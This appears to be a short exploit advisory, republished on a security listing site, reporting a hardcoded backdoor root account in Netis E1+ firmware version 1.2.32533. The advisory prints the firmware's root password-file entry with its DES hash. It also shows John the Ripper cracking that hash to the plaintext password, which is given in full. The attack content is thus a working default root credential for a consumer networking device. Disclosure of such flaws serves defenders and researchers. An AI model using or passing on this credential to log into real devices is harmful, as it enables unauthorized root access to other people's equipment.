Netis E1+ 1.2.32533 Backdoor Account (root)

2020.05.01
Credit: Besim ALTINOK
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Netis E1+ 1.2.32533 - Backdoor Account (root) # Date: 2020-04-25 # Author: Besim ALTINOK # Vendor Homepage: http://www.netis-systems.com # Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/204 # Version: V1.2.32533 # Tested on: Netis E1+ V1.2.32533 # Credit: ─░smail BOZKURT ----------------------------- *root:abSQTPcIskFGc:0:0:root:/:/bin/sh* Created directory: /home/pentestertraining/.john Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2-16]) Press 'q' or Ctrl-C to abort, almost any other key for status Warning: MaxLen = 13 is too large for the current hash type, reduced to 8*realtek (root)* 1g 0:00:00:28 3/3 0.03533g/s 1584Kp/s 1584Kc/s 1584KC/s realka2..reasll5 Use the "--show" option to display all of the cracked passwords reliably Session completed


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top